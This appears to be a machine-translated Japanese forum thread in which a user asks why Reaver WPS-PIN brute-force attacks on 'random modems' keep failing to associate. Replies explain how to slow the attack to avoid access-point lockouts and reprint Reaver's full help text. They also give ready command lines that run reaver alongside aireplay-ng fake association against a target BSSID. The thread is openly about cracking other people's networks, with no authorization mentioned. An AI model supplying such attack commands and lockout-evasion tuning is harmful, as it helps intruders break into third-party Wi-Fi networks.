私は、B43xxファミリのBroadcompciアダプタBCM4312を搭載したDellinspiron1564でAMD64を使用して最新のDebianを実行しています。
また、最新バージョンのreaverを実行しているので、このアダプターはLinuxに対応していないことがわかりました。ディスクと一緒にインストールできなかったため、fwファイルを要求されましたが、とにかく動作しました。Webサーフィンができます。 。
私の質問に対して、私はすべてwpsを使用してランダムモデムをクラックすることができました。このコンピューターを手に入れたのでNONE。
何が起こるかというと、BAMが関連付けを開始し、次にBAMの試行を開始し、約1%〜4%後に、毎分FAILED TO ASSOCIATEを実行し始め、一晩中それを実行できます。
私は約15の異なるモデムと同じ話を試しました
これを回避するためのトリックはありますか?おそらく成功をほぼ保証する何かをするためにコマンドを追加しますか?
ありがとう
リバーは繊細な獣であり、働くには優しい愛情のこもったケアが必要です。最も可能性が高いのは、アクセスポイントが一定期間に割り当てられた最大試行回数に達していることです。
攻撃を遅くする必要があります。
reaver -h
と入力すると、使用可能なすべてのオプションのリストが表示されます。
これらのオプションを試す必要があります。
使ってみてください
-a (auto detect beset options)
-d (give a long delay between requests)
-r (sleep after so many attempts)
-vv (very verbose, will show everything that is going on. You can then google any error messages you see)
-x (time to sleep after 10 failures)
私の標準設定。これが機能しない場合は、-xや-rなどのフラグを追加し始めます。
reaver -i mono0 -c 1 -b <someMacAddress> -vv -a
ヘルプページ
root@kali:/etc/apt# reaver -h
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP
Optional Arguments:
-m, --mac=<mac> MAC of the Host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<file> Send output to a log file [stdout]
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-D, --daemonize Daemonize reaver
-a, --auto Auto detect the best advanced options for the target AP
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv for more)
-q, --quiet Only display critical messages
-h, --help Show help
Advanced Options:
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [5]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, --nack Target AP always sends a NACK [Auto]
-w, --win7 Mimic a Windows 7 registrar [False]
ただしてください:
reaver with -N option
最初は-a
オプションを使用して何もしないでください。また、Aireplayとの関連付けを試みてください。
だからこれを行うだけです:
reaver -i wlan0 -b 00:12:34:56:78 -vv -N -S -A
同時に行う:
aireplay-ng -1 5 -a 00:12:34:56:78 wlan0
APとの関連付けに問題がある場合は、-1 30
以上の数字でAireplay-ngを試さないでください。